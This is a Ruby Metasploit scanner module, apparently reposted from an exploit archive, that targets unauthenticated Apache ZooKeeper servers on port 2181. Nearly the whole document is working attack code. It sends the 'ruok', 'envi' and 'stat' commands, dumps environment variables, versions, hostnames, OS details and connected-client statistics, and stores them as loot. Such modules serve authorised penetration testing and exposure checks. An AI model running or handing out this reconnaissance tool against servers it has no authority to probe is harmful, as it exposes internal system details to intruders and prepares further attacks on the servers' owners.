Share
## https://sploitus.com/exploit?id=PACKETSTORM:180635
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Apache ZooKeeper Information Disclosure',  
'Description' => %q{  
Apache ZooKeeper server service runs on TCP 2181 and by default, it is accessible without any authentication. This module targets Apache ZooKeeper service instances to extract information about the system environment, and service statistics.  
},  
'References' => [  
['URL', 'https://zooKeeper.apache.org/doc/current/zookeeperAdmin.html']  
],  
'Author' => [  
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'  
],  
'DisclosureDate' => '2020-10-14',  
'License' => MSF_LICENSE,  
'DefaultOptions' => { 'VERBOSE' => true },  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [],  
'Reliability' => []  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(2181),  
OptInt.new('TIMEOUT', [true, 'Timeout for the probe', 30])  
], self.class  
)  
  
deregister_options('USERNAME', 'PASSWORD')  
end  
  
def run_host(_ip)  
to = datastore['TIMEOUT'].zero? ? 30 : datastore['TIMEOUT']  
vprint_status("Using a timeout of #{to}...")  
begin  
::Timeout.timeout(to) do  
connect  
print_status('Verifying if service is responsive...')  
sock.put('ruok')  
data = sock.get_once(-1, to).to_s  
  
if data && (data.to_s =~ /imok/ || data.to_s =~ /whitelist/)  
print_good("Service looks fine. Going ahead with extraction..\n")  
sock.close  
  
connect  
print_status('Dumping environment info...')  
sock.put('envi')  
data = sock.get_once(-1, to).to_s  
  
if data && (data.to_s !~ /whitelist/)  
print_good(data.to_s)  
sock.close  
  
loot_name = 'environ-log'  
loot_type = 'text/plain'  
loot_desc = 'ZooKeeper Environment Log'  
loot_service = 'ZooKeeper'  
p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc, loot_service)  
print_good("File saved in: #{p} \n")  
  
version = data.match(/zookeeper.version=\s*\S*/).to_s.split('=')[1].split(',')[0]  
hname = data.match(/host.name=\s*\S*/).to_s.split('=')[1]  
os_type = data.match(/os.name=\s*\S*/).to_s.split('=')[1]  
os_arch = data.match(/os.arch=\s*\S*/).to_s.split('=')[1]  
os_ver = data.match(/os.version=\s*\S*/).to_s.split('=')[1]  
os = "#{os_type} #{os_arch} #{os_ver}"  
  
host_info = {  
host: rhost,  
os_name: os_type,  
name: hname,  
comments: os  
}  
report_host(host_info)  
report_service(host: rhost, port: rport, name: 'ZooKeeper', info: "Apache ZooKeeper: #{version}")  
else  
print_error('Server does not allow accessing environment information.')  
host_info = {  
host: rhost  
}  
report_host(host_info)  
report_service(host: rhost, port: rport, name: 'ZooKeeper', info: 'Apache ZooKeeper')  
end  
  
connect  
print_status('Dumping statistics about performance and connected clients...')  
sock.put('stat')  
data = sock.get_once(-1, to).to_s  
  
if data && (data.to_s !~ /whitelist/)  
print_good(data.to_s)  
sock.close  
  
loot_name = 'stat-log'  
loot_type = 'text/plain'  
loot_desc = 'ZooKeeper Stat Log'  
loot_service = 'ZooKeeper'  
p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc, loot_service)  
print_good("File saved in: #{p} \n")  
else  
print_error('Server does not allow accessing statistics.')  
end  
else  
print_error('No good response from server. Exiting.')  
end  
end  
rescue Timeout::Error, ::Rex::TimeoutError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError  
print_error("#{rhost}:#{rport} - Connection Failed...")  
ensure  
disconnect  
end  
end  
end